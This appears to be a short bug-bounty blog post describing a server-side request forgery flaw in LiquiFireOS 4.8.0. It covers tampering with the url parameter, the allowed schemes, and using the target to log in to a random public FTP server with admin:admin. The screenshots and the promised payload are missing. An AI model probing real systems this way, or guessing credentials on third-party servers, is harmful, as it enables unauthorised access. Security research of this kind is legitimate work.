sobota, 28 grudnia 2019

Testing SSRF in LiquiFireOS

During one bugbounty I found that the target webapp is presenting some 'interesting errors' in responses. ;) As this is always a nice and cool 'hint' to see during pentests/ctfs I decided to dig a little bit more. Below you will find the details for SSRF found in LiquiFireOS. Here we go...

Today we'll start here:

This solutions was 'something new' for me. Example response I found online during bugbounty:
I decided to use Burp Suite and try few of the scenarios described in one of the posts available on the blog:

Few more cases (and sample response):

So it looks like we're talking about version 4.8.0 :) Cool, next:

As you can see (example requests from Intruder) there is a nice part of the link, for example url.
I decided to check some other 'url' :) Results below:

That looks interesting ;> So what is the problem? Maybe the port? Maybe the hostname? I will try to change both of them:

That's nice :) Is there any other parameter available for this kind of modification?

To verify it I decided to read a very nice book for Christmas - called the manual: ;)

You can find few more cool cases and examples there.

As I saw in one of the error messages, there are only 4 possibilities to use: http://, ftp://, file:// and cms://. I decided to use http and ftp:

Nice response. ;)

I decided to check if the target app will be able to do something else for me. For example to log in to some (internal?;)) ftp server. Because I do not have one (in the 'target/bugbounty company' ;)) I decided to use some nice-for-cats-ftp server I found online. Let's try to log in with admin:admin credentials:

Looks promising ;)

If you will see the main page ('of the target') there should be something like this:

Sample payload to use in your URL:

Maybe you'll find it useful.

See you next time!


Brak komentarzy:

Prześlij komentarz